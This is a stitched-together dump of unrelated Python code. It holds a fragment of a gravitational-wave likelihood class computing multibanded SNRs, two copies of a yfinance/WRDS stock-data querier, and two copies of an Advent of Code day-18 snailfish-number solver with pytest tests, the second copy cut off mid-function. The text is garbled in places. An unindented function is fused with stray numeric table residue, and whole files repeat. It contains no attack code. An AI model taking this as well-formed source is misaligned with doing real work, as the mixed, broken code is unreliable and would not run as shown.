                ifo.power_spectral_density_array[ifo.frequency_mask]
            for b in range(len(self.fb_dfb) - 1):
                # Inverse PSD transformed to the time domain and folded to Nhatbs[b] samples.
                Imb = np.fft.irfft(full_inv_psds[:self.Nbs[b] // 2 + 1])
                half_length = Nhatbs[b] // 2
                Imbc = np.append(Imb[:half_length + 1], Imb[-(Nhatbs[b] - half_length - 1):])
                self.Ibcs[ifo.name].append(np.fft.rfft(Imbc))
                # Allocate arrays for IFFT-FFT operations
                self.hbcs[ifo.name].append(np.zeros(Nhatbs[b]))
                self.wths[ifo.name].append(np.zeros(self.Mbs[b] // 2 + 1, dtype=complex))
        # precompute windows and their square roots
        self.windows = np.array([])
        self.square_root_windows = np.array([])
        for b in range(len(self.fb_dfb) - 1):
            start, end = self.start_end_idxs[b]
            ws = self._window(self.banded_frequency_points[start:end + 1], b)
            self.windows = np.append(self.windows, ws)
            self.square_root_windows = np.append(self.square_root_windows, np.sqrt(ws))
    def calculate_snrs(self, waveform_polarizations, interferometer):
        """
        Compute the snrs for multi-banding
        Parameters
        ----------
        waveform_polarizations: waveform
        interferometer: bilby.gw.detector.Interferometer
        Returns
        -------
        snrs: named tuple of snrs
        """
        # Project the polarizations onto the detector at the banded frequency points.
        strain = np.zeros(len(self.banded_frequency_points), dtype=complex)
        for mode in waveform_polarizations:
            response = interferometer.antenna_response(
                self.parameters['ra'], self.parameters['dec'],
                self.parameters['geocent_time'], self.parameters['psi'],
                mode
            )
            strain += waveform_polarizations[mode][self.unique_to_original_frequencies] * response
        # Total time shift: geocenter-to-detector delay plus offset from data start.
        dt = interferometer.time_delay_from_geocenter(
            self.parameters['ra'], self.parameters['dec'],
            self.parameters['geocent_time'])
        dt_geocent = self.parameters['geocent_time'] - interferometer.strain_data.start_time
        ifo_time = dt_geocent + dt
        calib_factor = interferometer.calibration_model.get_calibration_factor(
            self.banded_frequency_points, prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
        strain *= np.exp(-1j * 2. * np.pi * self.banded_frequency_points * ifo_time)
        strain *= np.conjugate(calib_factor)
        # (d, h) from the precomputed linear coefficients.
        d_inner_h = np.dot(strain, self.linear_coeffs[interferometer.name])
        if self.linear_interpolation:
            # (h, h) via linear-interpolation coefficients.
            optimal_snr_squared = np.vdot(
                np.real(strain * np.conjugate(strain)),
                self.quadratic_coeffs[interferometer.name]
            )
        else:
            # (h, h) via the IFFT-FFT algorithm, accumulated band by band.
            optimal_snr_squared = 0.
            for b in range(len(self.fb_dfb) - 1):
                Ks, Ke = self.Ks_Ke[b]
                start_idx, end_idx = self.start_end_idxs[b]
                Mb = self.Mbs[b]
                if b == 0:
                    # First band is summed directly in the frequency domain.
                    optimal_snr_squared += (4. / self.interferometers.duration) * np.vdot(
                        np.real(strain[start_idx:end_idx + 1] * np.conjugate(strain[start_idx:end_idx + 1])),
                        interferometer.frequency_mask[Ks:Ke + 1] * self.windows[start_idx:end_idx + 1]
                        / interferometer.power_spectral_density_array[Ks:Ke + 1])
                else:
                    self.wths[interferometer.name][b][Ks:Ke + 1] = self.square_root_windows[start_idx:end_idx + 1] \
                        * strain[start_idx:end_idx + 1]
                    self.hbcs[interferometer.name][b][-Mb:] = np.fft.irfft(self.wths[interferometer.name][b])
                    thbc = np.fft.rfft(self.hbcs[interferometer.name][b])
                    optimal_snr_squared += (4. / self.Tbhats[b]) * np.vdot(
                        np.real(thbc * np.conjugate(thbc)), self.Ibcs[interferometer.name][b])
        complex_matched_filter_snr = d_inner_h / (optimal_snr_squared**0.5)
        return self._CalculatedSNRs(
            d_inner_h=d_inner_h, optimal_snr_squared=optimal_snr_squared,
            complex_matched_filter_snr=complex_matched_filter_snr,
            d_inner_h_squared_tc_array=None,
            d_inner_h_array=None,
            optimal_snr_squared_array=None)
def _rescale_signal(self, signal, new_distance):
for mode in signal:
signal[mode] *= self._ref_dist / new_distance | 0.844537 | 0.434101 |
import pandas as pd
import yfinance as yf
import logging
import wrds
TABLE_NUM = 0
STOCK_COLUMN = "Symbol"
class DataQuerierYF:
    """Download price history for all tickers listed in a table at ``cfg.link``.

    The ticker table is scraped with ``pandas.read_html``; data are fetched via
    ``yfinance`` and optionally saved to ``cfg.data_path`` as parquet.
    """

    def __init__(self, cfg, load_on_init=True, save=True, **kwargs):
        self.cfg = cfg
        self.company_list = pd.read_html(self.cfg.link)[TABLE_NUM][STOCK_COLUMN].tolist()
        # Bug fix: "%d ... %s".format(...) never interpolates %-placeholders;
        # pass lazy %-style arguments to logging instead.
        logging.info("Attempting load for %d stocks from %s", len(self.company_list), self.cfg.link)
        # True when download parameters come from kwargs instead of cfg.params.
        self.from_params = bool(kwargs)
        self.save_data = save
        self.kwargs = kwargs
        if load_on_init:
            self()

    def __call__(self):
        self.__get_tickers(self.kwargs)
        if self.save_data:
            self.__save()
        logging.info("Loaded %d stocks from %s", len(self.stock_hist.columns), self.cfg.link)
        return self.stock_hist

    def __save(self):
        # Parquet preserves dtypes; destination comes from the config object.
        self.stock_hist.to_parquet(self.cfg.data_path)

    def __get_tickers(self, kwargs):
        # Prefer explicit keyword arguments; fall back to the config's params.
        params = kwargs if self.from_params else self.cfg.params
        self.stock_hist = yf.download(tickers=self.company_list, **params)
        return self.stock_hist
class SharesOutStandingQuerier:
    """Query CRSP (via WRDS) for daily shares outstanding of the given tickers.

    On construction this resolves tickers to permcos (``self.permcos``) and
    fetches date/permco/shrout rows between the two dates (``self.sharesout``).
    """

    def __init__(self, company_permcos_name, dates, first_connection=False, username="ghandri", **kwargs):
        self.company_permcos_name = pd.DataFrame({"ticker": company_permcos_name})
        self.dates = dates
        self.db = wrds.Connection(wrds_username=username)
        if first_connection:
            # Store credentials in ~/.pgpass so later connections do not prompt.
            self.db.create_pgpass_file()
        self.__get_permcos()
        print(self.permcos)
        self.__query_company()
        self.db.close()

    def __get_permcos(self):
        # Names valid on 2009-01-01; inner-join on ticker keeps only requested companies.
        query_res = self.db.raw_sql("select permco , ticker, namedt, nameenddt,comnam "
                                    "from crsp.stocknames "
                                    "where namedt <'2009-01-01' and nameenddt >'2009-01-01'")
        self.permcos = query_res[["permco", "ticker"]].merge(self.company_permcos_name, on="ticker")

    def __call__(self):
        return

    def __query_company(self):
        # NOTE(review): values are interpolated into the SQL text; permcos come from
        # CRSP and dates from the caller, but raw_sql(..., params=...) would be safer.
        params = {'permco': tuple(self.permcos["permco"]), 'low': self.dates[0], 'high': self.dates[1]}
        # Bug fix: a space was missing between '{low}' and "and", producing
        # invalid SQL ("... >= '2009-01-01'and date <= ...") after concatenation.
        self.sharesout = self.db.raw_sql("select date,permco,shrout "
                                         "from crsp.dsf "
                                         "where permco in {permco} "
                                         "and date >= '{low}' "
                                         "and date <= '{high}'".format(**params))
        return self.sharesout
import pandas as pd
import yfinance as yf
import logging
import wrds
TABLE_NUM = 0
STOCK_COLUMN = "Symbol"
class DataQuerierYF:
    """Download price history for all tickers listed in a table at ``cfg.link``.

    The ticker table is scraped with ``pandas.read_html``; data are fetched via
    ``yfinance`` and optionally saved to ``cfg.data_path`` as parquet.
    """

    def __init__(self, cfg, load_on_init=True, save=True, **kwargs):
        self.cfg = cfg
        self.company_list = pd.read_html(self.cfg.link)[TABLE_NUM][STOCK_COLUMN].tolist()
        # Bug fix: "%d ... %s".format(...) never interpolates %-placeholders;
        # pass lazy %-style arguments to logging instead.
        logging.info("Attempting load for %d stocks from %s", len(self.company_list), self.cfg.link)
        # True when download parameters come from kwargs instead of cfg.params.
        self.from_params = bool(kwargs)
        self.save_data = save
        self.kwargs = kwargs
        if load_on_init:
            self()

    def __call__(self):
        self.__get_tickers(self.kwargs)
        if self.save_data:
            self.__save()
        logging.info("Loaded %d stocks from %s", len(self.stock_hist.columns), self.cfg.link)
        return self.stock_hist

    def __save(self):
        # Parquet preserves dtypes; destination comes from the config object.
        self.stock_hist.to_parquet(self.cfg.data_path)

    def __get_tickers(self, kwargs):
        # Prefer explicit keyword arguments; fall back to the config's params.
        params = kwargs if self.from_params else self.cfg.params
        self.stock_hist = yf.download(tickers=self.company_list, **params)
        return self.stock_hist
class SharesOutStandingQuerier:
    """Query CRSP (via WRDS) for daily shares outstanding of the given tickers.

    On construction this resolves tickers to permcos (``self.permcos``) and
    fetches date/permco/shrout rows between the two dates (``self.sharesout``).
    """

    def __init__(self, company_permcos_name, dates, first_connection=False, username="ghandri", **kwargs):
        self.company_permcos_name = pd.DataFrame({"ticker": company_permcos_name})
        self.dates = dates
        self.db = wrds.Connection(wrds_username=username)
        if first_connection:
            # Store credentials in ~/.pgpass so later connections do not prompt.
            self.db.create_pgpass_file()
        self.__get_permcos()
        print(self.permcos)
        self.__query_company()
        self.db.close()

    def __get_permcos(self):
        # Names valid on 2009-01-01; inner-join on ticker keeps only requested companies.
        query_res = self.db.raw_sql("select permco , ticker, namedt, nameenddt,comnam "
                                    "from crsp.stocknames "
                                    "where namedt <'2009-01-01' and nameenddt >'2009-01-01'")
        self.permcos = query_res[["permco", "ticker"]].merge(self.company_permcos_name, on="ticker")

    def __call__(self):
        return

    def __query_company(self):
        # NOTE(review): values are interpolated into the SQL text; permcos come from
        # CRSP and dates from the caller, but raw_sql(..., params=...) would be safer.
        params = {'permco': tuple(self.permcos["permco"]), 'low': self.dates[0], 'high': self.dates[1]}
        # Bug fix: a space was missing between '{low}' and "and", producing
        # invalid SQL ("... >= '2009-01-01'and date <= ...") after concatenation.
        self.sharesout = self.db.raw_sql("select date,permco,shrout "
                                         "from crsp.dsf "
                                         "where permco in {permco} "
                                         "and date >= '{low}' "
                                         "and date <= '{high}'".format(**params))
        return self.sharesout
import json
import math
from typing import Union, Tuple, NamedTuple, Optional, List
import pytest
# Each case pairs a raw puzzle-input string with the expected parsed numbers.
@pytest.mark.parametrize(
    "input_string, expected",
    [
        ("1", [1]),
        ("[1,2]", [(1, 2)]),
        ("[[[7,1],2],3]\n[[1,7],7]", [(((7, 1), 2), 3), ((1, 7), 7)]),
    ],
)
def test_parse_input(input_string, expected):
    """parse_input turns each line into a nested-tuple snailfish number."""
    assert parse_input(input_string) == expected
def parse_input(input_string: str):
    """Parse a multi-line puzzle input into a list of snailfish numbers."""
    lines = input_string.strip().split("\n")
    return [parse_line(single_line) for single_line in lines]
def parse_line(line: str):
    """Parse one input line into a snailfish number (nested tuples)."""
    parsed = json.loads(line)
    return nested_lists_to_nested_tuples(parsed)
def nested_lists_to_nested_tuples(as_list):
    """Recursively convert nested lists into nested tuples.

    Non-list values (ints) are returned unchanged. Checks against builtin
    ``list``: ``isinstance`` with ``typing.List`` is deprecated and needless.
    """
    if not isinstance(as_list, list):
        return as_list
    return tuple(nested_lists_to_nested_tuples(item) for item in as_list)
class ExplosionSpec(NamedTuple):
    """Location and payload of the leftmost pair nested four levels deep."""
    index: Tuple[int, ...]  # path of 0/1 child choices from the root to the pair
    left_value: int  # added to the nearest regular number on the left
    right_value: int  # added to the nearest regular number on the right
# Cases cover: no explosion at shallow depth, explosion exactly at depth 4,
# the leftmost-pair preference, and a non-trivial starting index_so_far.
@pytest.mark.parametrize(
    "snail_fish_number, index_so_far, expected",
    [
        ((1, 2), None, None),
        ((1, 2), (0,), None),
        ((1, 2), (0, 0), None),
        ((1, 2), (0, 0, 0), None),
        (
            (1, 2),
            (0, 0, 0, 0),
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
        (((1, 2), 3), None, None),
        (((1, 2), 3), (0, 0), None),
        (
            ((1, 2), 3),
            (0, 0, 0),
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
        (
            (((1, 2), 3), 4),
            (0, 0),
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
        (
            ((((1, 2), 3), 4), 5),
            (0,),
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
        (
            (((((1, 2), 3), 4), 5), 6),
            None,
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
        (
            (((((9, 8), 1), 2), 3), 4),
            None,
            ExplosionSpec(index=(0, 0, 0, 0), left_value=9, right_value=8),
        ),
        (
            (1, (2, (3, (4, (5, 6))))),
            None,
            ExplosionSpec(index=(1, 1, 1, 1), left_value=5, right_value=6),
        ),
        (
            (1, (2, (3, ((4, 5), 6)))),
            None,
            ExplosionSpec(index=(1, 1, 1, 0), left_value=4, right_value=5),
        ),
        (
            (((((1, 2), 3), 4), 5), (6, (7, (8, (9, 10))))),
            None,
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
    ],
)
def test_find_first_explosion(snail_fish_number, index_so_far, expected):
    """The leftmost depth-4 pair (if any) is reported with its values."""
    assert (
        find_first_explosion(snail_fish_number, index_so_far=index_so_far) == expected
    )
def find_first_explosion(
    snail_fish_number, index_so_far: Tuple[int, ...] = None
) -> Optional[ExplosionSpec]:
    """Depth-first search for the leftmost pair nested four levels deep.

    Returns an ExplosionSpec describing that pair, or None when nothing explodes.
    """
    path = tuple() if index_so_far is None else index_so_far
    if isinstance(snail_fish_number, int):
        # Regular numbers never explode.
        return None
    if len(path) == 4:
        return ExplosionSpec(
            index=path,
            left_value=snail_fish_number[0],
            right_value=snail_fish_number[1],
        )
    # Visit children left-to-right so the leftmost explosion wins.
    for child_pos, child in enumerate(snail_fish_number):
        found = find_first_explosion(
            snail_fish_number=child, index_so_far=path + (child_pos,)
        )
        if found:
            return found
    return None
def find_left_neighbor_index(
    snail_fish_number, index: Tuple[int, ...]
) -> Optional[Tuple[int, ...]]:
    """Index of the regular number immediately left of ``index``, or None.

    An all-zero path means the node is leftmost and has no left neighbor.
    """
    if not any(index):
        return None
    # Step up to the deepest right branch, go left once, then descend rightwards
    # until a regular number is reached.
    branch = find_index_of_last_value(index, 1)
    neighbor = index[:branch] + (0,)
    while is_tuple_at_location(snail_fish_number, neighbor):
        neighbor = neighbor + (1,)
    return neighbor
def is_tuple_at_location(snail_fish_number, index: Tuple[int, ...]):
    """Return True when ``index`` addresses a pair rather than a regular number."""
    located = get_value_at_index(snail_fish_number=snail_fish_number, index=index)
    return isinstance(located, tuple)
def get_value_at_index(snail_fish_number, index):
    """Follow the 0/1 choices in ``index`` down the nested tuples."""
    node = snail_fish_number
    for branch in index:
        node = node[branch]
    return node
def find_index_of_last_value(tt: Tuple[int, ...], target_value):
    """Return the largest position where ``target_value`` occurs in ``tt``, else None."""
    for position in range(len(tt) - 1, -1, -1):
        if tt[position] == target_value:
            return position
    return None
# Cases cover: leftmost pair (no neighbor), sibling lookups, and descending
# through nested pairs to find the nearest regular number on the left.
@pytest.mark.parametrize(
    "snail_fish_number, index, expected",
    [
        ((((((1, 2), 3), 4), 5), 6), (0, 0, 0, 0), None),
        ((1, (2, (3, (4, (5, 6))))), (1, 1, 1, 1), (1, 1, 1, 0)),
        ((1, (2, (3, ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 0)),
        ((1, (2, ((3, 4), ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 0, 1)),
        (((1, (2, (3, 4))), ((((10, 9), 8), 7), 6)), (1, 0, 0, 0), (0, 1, 1, 1)),
    ],
)
def test_find_left_neighbor_index(snail_fish_number, index, expected):
    """The nearest regular number to the left is located (or None)."""
    assert (
        find_left_neighbor_index(snail_fish_number=snail_fish_number, index=index)
        == expected
    )
def find_right_neighbor_index(snail_fish_number, index: Tuple[int, ...]):
    """Index of the regular number immediately right of ``index``, or None.

    An all-one path means the node is rightmost and has no right neighbor.
    """
    if all(index):
        return None
    # Step up to the deepest left branch, go right once, then descend leftwards
    # until a regular number is reached.
    branch = find_index_of_last_value(index, 0)
    neighbor = index[:branch] + (1,)
    while is_tuple_at_location(snail_fish_number, neighbor):
        neighbor = neighbor + (0,)
    return neighbor
# Mirror of the left-neighbor cases: rightmost pair has no neighbor.
@pytest.mark.parametrize(
    "snail_fish_number, index, expected",
    [
        ((((((1, 2), 3), 4), 5), 6), (0, 0, 0, 0), (0, 0, 0, 1)),
        ((1, (2, (3, (4, (5, 6))))), (1, 1, 1, 1), None),
        ((1, (2, (3, ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 1, 1)),
        ((1, (2, ((3, 4), ((4, 5), 6)))), (1, 1, 1, 0), (1, 1, 1, 1)),
        (((1, (2, (3, 4))), ((((10, 9), 8), 7), 6)), (1, 0, 0, 0), (1, 0, 0, 1)),
    ],
)
def test_find_right_neighbor_index(snail_fish_number, index, expected):
    """The nearest regular number to the right is located (or None)."""
    assert (
        find_right_neighbor_index(snail_fish_number=snail_fish_number, index=index)
        == expected
    )
class ExplodeReplaceCommand:
    """Rebuild a snailfish number with one explosion applied.

    The pair at ``spec.index`` becomes 0, and its left/right values are added
    to the nearest regular numbers on either side (when they exist).
    """
    def __init__(self, spec: ExplosionSpec, snail_fish_number):
        self.snail_fish_number = snail_fish_number
        self.explosion_spec = spec
        # Indices of the regular numbers receiving the exploded values; may be None.
        self.left_index = find_left_neighbor_index(
            snail_fish_number=snail_fish_number, index=spec.index
        )
        self.right_index = find_right_neighbor_index(
            snail_fish_number=snail_fish_number, index=spec.index
        )
    def get_value(self, index: Tuple[int, ...]) -> Union[Tuple, int]:
        """Return the post-explosion value of the node at ``index`` (recursive)."""
        if index == self.explosion_spec.index:
            return 0
        value_at_index = get_value_at_index(
            snail_fish_number=self.snail_fish_number, index=index
        )
        if index == self.left_index:
            return value_at_index + self.explosion_spec.left_value
        if index == self.right_index:
            return value_at_index + self.explosion_spec.right_value
        if isinstance(value_at_index, int):
            return value_at_index
        return tuple(self.get_value(index + (i,)) for i in range(len(value_at_index)))
def explode(snail_fish_number, index_so_far: Tuple[int, ...] = None):
    """Apply the leftmost explosion, returning the (possibly unchanged) number.

    ``index_so_far`` is accepted but unused; the search always starts at the
    root.  # NOTE(review): the parameter looks vestigial — confirm before removing.
    """
    explosion_spec = find_first_explosion(snail_fish_number)
    if not explosion_spec:
        return snail_fish_number
    return ExplodeReplaceCommand(
        spec=explosion_spec, snail_fish_number=snail_fish_number
    ).get_value(tuple())
# Worked examples from the puzzle: first case has nothing to explode.
@pytest.mark.parametrize(
    "snail_fish_number, expected",
    [
        (((((0, 1), 2), 3), 4), ((((0, 1), 2), 3), 4)),
        ((((((9, 8), 1), 2), 3), 4), ((((0, 9), 2), 3), 4)),
        ((7, (6, (5, (4, (3, 2))))), (7, (6, (5, (7, 0))))),
        (((6, (5, (4, (3, 2)))), 1), ((6, (5, (7, 0))), 3)),
        (
            ((3, (2, (1, (7, 3)))), (6, (5, (4, (3, 2))))),
            ((3, (2, (8, 0))), (9, (5, (4, (3, 2))))),
        ),
        (
            ((3, (2, (8, 0))), (9, (5, (4, (3, 2))))),
            ((3, (2, (8, 0))), (9, (5, (7, 0)))),
        ),
    ],
)
def test_explode(snail_fish_number, expected):
    """Exactly one (leftmost) explosion is applied per call."""
    assert explode(snail_fish_number) == expected
class SplitSfnCommand:
    """Split the leftmost regular number >= 10 into a (floor, ceil) pair.

    The instance counts splits so that only the first qualifying number in a
    traversal is split; use a fresh instance per traversal.
    """
    def __init__(self):
        # Number of splits performed so far; at most one per traversal.
        self.split_count = 0
    def split(self, snail_fish_number):
        """Return the number with at most one split applied (leftmost first)."""
        if self.split_count > 0:
            # A split already happened somewhere to the left; copy through.
            return snail_fish_number
        if isinstance(snail_fish_number, int):
            if snail_fish_number < 10:
                return snail_fish_number
            return self.split_number(snail_fish_number)
        return tuple(self.split(element) for element in snail_fish_number)
    def split_number(self, number):
        """Split one regular number into halves, rounding the left one down."""
        self.split_count += 1
        lower_half = math.floor(number / 2.0)
        return lower_half, number - lower_half
# Only the leftmost number >= 10 is split; odd values round the left half down.
@pytest.mark.parametrize(
    "snail_fish_number, expected",
    [
        ((1, 2), (1, 2)),
        ((10, 2), ((5, 5), 2)),
        ((11, 2), ((5, 6), 2)),
        ((1, 12), (1, (6, 6))),
        ((1, 13), (1, (6, 7))),
        ((1, (2, 10)), (1, (2, (5, 5)))),
        ((1, (2, (3, 10))), (1, (2, (3, (5, 5))))),
        ((11, 12), ((5, 6), 12)),
    ],
)
def test_split_sfn(snail_fish_number, expected):
    """A fresh SplitSfnCommand splits at most one number per traversal."""
    assert SplitSfnCommand().split(snail_fish_number) == expected
def sfn_add(sfn_a, sfn_b):
    """Snailfish addition: pair the two operands (reduction happens separately)."""
    return (sfn_a, sfn_b)
# Addition simply nests the operands into a new pair.
@pytest.mark.parametrize(
    "sfn_a, sfn_b, expected",
    [
        ((1, 2), (3, 4), ((1, 2), (3, 4))),
        ((1, (2, (3, 4))), ((5, 6), 7), ((1, (2, (3, 4))), ((5, 6), 7))),
    ],
)
def test_sfn_add(sfn_a, sfn_b, expected):
    """sfn_add pairs its operands without reducing."""
    assert sfn_add(sfn_a, sfn_b) == expected
def sfn_reduce(sfn):
    """Repeatedly explode (to exhaustion) then split (once) until stable.

    Explosions take priority over splits, hence the inner fixed-point loop
    before each single split attempt.
    """
    previous_sfn = None
    while sfn != previous_sfn:
        # Explode until nothing changes.
        while sfn != previous_sfn:
            previous_sfn = sfn
            sfn = explode(previous_sfn)
        # At most one split; a change restarts the outer loop.
        sfn = SplitSfnCommand().split(sfn)
    return sfn
# Mixed explode/split sequences from the puzzle description.
@pytest.mark.parametrize(
    "sfn, expected",
    [
        ((1, 2), (1, 2)),
        ((((((9, 8), 1), 2), 3), 4), ((((0, 9), 2), 3), 4)),
        (
            ((3, (2, (1, (7, 3)))), (6, (5, (4, (3, 2))))),
            ((3, (2, (8, 0))), (9, (5, (7, 0)))),
        ),
        ((1, 13), (1, (6, 7))),
        ((12, 13), ((6, 6), (6, 7))),
        (
            (((((4, 3), 4), 4), (7, ((8, 4), 9))), (1, 1)),
            ((((0, 7), 4), ((7, 8), (6, 0))), (8, 1)),
        ),
    ],
)
def test_sfn_reduce(sfn, expected):
    """Reduction reaches the documented fixed points."""
    assert sfn_reduce(sfn) == expected
def add_and_reduce_many_sfns(sfns: List[Tuple]):
    """Left-fold the list with snailfish addition, reducing after every step."""
    numbers = iter(sfns)
    total = next(numbers)
    for addend in numbers:
        total = sfn_reduce(sfn_add(total, addend))
    return total
def test_add_and_reduce_many_sfns():
    """Ten-number worked example from the puzzle description."""
    assert add_and_reduce_many_sfns(
        [
            (((0, (4, 5)), (0, 0)), (((4, 5), (2, 6)), (9, 5))),
            (7, (((3, 7), (4, 3)), ((6, 3), (8, 8)))),
            ((2, ((0, 8), (3, 4))), (((6, 7), 1), (7, (1, 6)))),
            ((((2, 4), 7), (6, (0, 5))), (((6, 8), (2, 8)), ((2, 1), (4, 5)))),
            (7, (5, ((3, 8), (1, 4)))),
            ((2, (2, 2)), (8, (8, 1))),
            (2, 9),
            (1, (((9, 3), 9), ((9, 0), (0, 7)))),
            (((5, (7, 4)), 7), 1),
            ((((4, 2), 2), 6), (8, 7)),
        ]
    ) == (
        (((8, 7), (7, 7)), ((8, 6), (7, 7))),
        (((0, 7), (6, 6)), (8, 7)),
    )
def sfn_magnitude(sfn):
    """Magnitude: 3 * left + 2 * right, recursively; an int is its own magnitude."""
    if isinstance(sfn, int):
        return sfn
    left, right = sfn
    return 3 * sfn_magnitude(left) + 2 * sfn_magnitude(right)
# Magnitude examples from the puzzle description.
@pytest.mark.parametrize(
    "sfn, expected",
    [
        ((1, 2), 7),
        ((9, 1), 29),
        (((1, 2), ((3, 4), 5)), 143),
        (((((8, 7), (7, 7)), ((8, 6), (7, 7))), (((0, 7), (6, 6)), (8, 7))), 3488),
    ],
)
def test_sfn_magnitude(sfn, expected):
    """Magnitude weights left children by 3 and right children by 2."""
    assert sfn_magnitude(sfn) == expected
def do_homework(sfns):
    """Part 1: magnitude of the reduced sum of all given snailfish numbers."""
    return sfn_magnitude(add_and_reduce_many_sfns(sfns))
# Worked example input from the day-18 puzzle; expected part-1 magnitude is 4140.
EXAMPLE_HOMEWORK = [
    (((0, (5, 8)), ((1, 7), (9, 6))), ((4, (1, 2)), ((1, 4), 2))),
    (((5, (2, 8)), 4), (5, ((9, 9), 0))),
    (6, (((6, 2), (5, 6)), ((7, 6), (4, 7)))),
    (((6, (0, 7)), (0, 9)), (4, (9, (9, 0)))),
    (((7, (6, 4)), (3, (1, 3))), (((5, 5), 1), 9)),
    ((6, ((7, 3), (3, 2))), (((3, 8), (5, 7)), 4)),
    ((((5, 4), (7, 7)), 8), ((8, 3), 8)),
    ((9, 3), ((9, 9), (6, (4, 9)))),
    ((2, ((7, 7), 7)), ((5, 8), ((9, 3), (0, 2)))),
    ((((5, 2), 5), (8, (3, 7))), ((5, (7, 5)), (4, 4))),
]
def test_do_homework():
    """Part-1 answer for the worked example is 4140."""
    assert do_homework(EXAMPLE_HOMEWORK) == 4140
def do_homework_part_2(sfns):
    """Part 2: largest magnitude from adding any two distinct numbers.

    Snailfish addition is not commutative, so both orders of each pair are tried.
    """
    # default=0 preserves the original behavior when there are no pairs.
    return max(
        (do_homework(pair) for pair in get_all_pairs(sfns)),
        default=0,
    )
def get_all_pairs(sfns):
    """Yield every ordered pair of distinct elements of ``sfns``."""
    for first_pos, first in enumerate(sfns):
        for second_pos, second in enumerate(sfns):
            if first_pos != second_pos:
                yield [first, second]
def test_do_homework_part_2():
    """Part-2 answer for the worked example is 3993."""
    assert do_homework_part_2(EXAMPLE_HOMEWORK) == 3993
def part_a(filepath: str):
    """Read the puzzle input from ``filepath`` and return the part-1 answer."""
    with open(filepath, "r") as file:
        sfns = parse_input(file.read())
    return do_homework(sfns)
def part_b(filepath: str):
    """Read the puzzle input from ``filepath`` and return the part-2 answer."""
    with open(filepath, "r") as file:
        sfns = parse_input(file.read())
    return do_homework_part_2(sfns)
if __name__ == "__main__":
    # Print both answers when run as a script.
    day = 18
    input_file = f"../puzzle_input/day{day}.txt"
    print(f"The answer to {day}A is: {part_a(input_file)}")
    # Removed dataset-extraction residue "| src/day18.py |" fused onto this line,
    # keeping the import that belongs to the following chunk.
    print(f"The answer to {day}B is: {part_b(input_file)}")
import json
import math
from typing import Union, Tuple, NamedTuple, Optional, List
import pytest
# Each case pairs a raw puzzle-input string with the expected parsed numbers.
@pytest.mark.parametrize(
    "input_string, expected",
    [
        ("1", [1]),
        ("[1,2]", [(1, 2)]),
        ("[[[7,1],2],3]\n[[1,7],7]", [(((7, 1), 2), 3), ((1, 7), 7)]),
    ],
)
def test_parse_input(input_string, expected):
    """parse_input turns each line into a nested-tuple snailfish number."""
    assert parse_input(input_string) == expected
def parse_input(input_string: str):
    """Parse a multi-line puzzle input into a list of snailfish numbers."""
    lines = input_string.strip().split("\n")
    return [parse_line(single_line) for single_line in lines]
def parse_line(line: str):
    """Parse one input line into a snailfish number (nested tuples)."""
    parsed = json.loads(line)
    return nested_lists_to_nested_tuples(parsed)
def nested_lists_to_nested_tuples(as_list):
    """Recursively convert nested lists into nested tuples.

    Non-list values (ints) are returned unchanged. Checks against builtin
    ``list``: ``isinstance`` with ``typing.List`` is deprecated and needless.
    """
    if not isinstance(as_list, list):
        return as_list
    return tuple(nested_lists_to_nested_tuples(item) for item in as_list)
class ExplosionSpec(NamedTuple):
    """Location and payload of the leftmost pair nested four levels deep."""
    index: Tuple[int, ...]  # path of 0/1 child choices from the root to the pair
    left_value: int  # added to the nearest regular number on the left
    right_value: int  # added to the nearest regular number on the right
# Cases cover: no explosion at shallow depth, explosion exactly at depth 4,
# the leftmost-pair preference, and a non-trivial starting index_so_far.
@pytest.mark.parametrize(
    "snail_fish_number, index_so_far, expected",
    [
        ((1, 2), None, None),
        ((1, 2), (0,), None),
        ((1, 2), (0, 0), None),
        ((1, 2), (0, 0, 0), None),
        (
            (1, 2),
            (0, 0, 0, 0),
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
        (((1, 2), 3), None, None),
        (((1, 2), 3), (0, 0), None),
        (
            ((1, 2), 3),
            (0, 0, 0),
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
        (
            (((1, 2), 3), 4),
            (0, 0),
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
        (
            ((((1, 2), 3), 4), 5),
            (0,),
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
        (
            (((((1, 2), 3), 4), 5), 6),
            None,
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
        (
            (((((9, 8), 1), 2), 3), 4),
            None,
            ExplosionSpec(index=(0, 0, 0, 0), left_value=9, right_value=8),
        ),
        (
            (1, (2, (3, (4, (5, 6))))),
            None,
            ExplosionSpec(index=(1, 1, 1, 1), left_value=5, right_value=6),
        ),
        (
            (1, (2, (3, ((4, 5), 6)))),
            None,
            ExplosionSpec(index=(1, 1, 1, 0), left_value=4, right_value=5),
        ),
        (
            (((((1, 2), 3), 4), 5), (6, (7, (8, (9, 10))))),
            None,
            ExplosionSpec(index=(0, 0, 0, 0), left_value=1, right_value=2),
        ),
    ],
)
def test_find_first_explosion(snail_fish_number, index_so_far, expected):
    """The leftmost depth-4 pair (if any) is reported with its values."""
    assert (
        find_first_explosion(snail_fish_number, index_so_far=index_so_far) == expected
    )
def find_first_explosion(
    snail_fish_number, index_so_far: Tuple[int, ...] = None
) -> Optional[ExplosionSpec]:
    """Depth-first search for the leftmost pair nested four levels deep.

    Returns an ExplosionSpec describing that pair, or None when nothing explodes.
    """
    path = tuple() if index_so_far is None else index_so_far
    if isinstance(snail_fish_number, int):
        # Regular numbers never explode.
        return None
    if len(path) == 4:
        return ExplosionSpec(
            index=path,
            left_value=snail_fish_number[0],
            right_value=snail_fish_number[1],
        )
    # Visit children left-to-right so the leftmost explosion wins.
    for child_pos, child in enumerate(snail_fish_number):
        found = find_first_explosion(
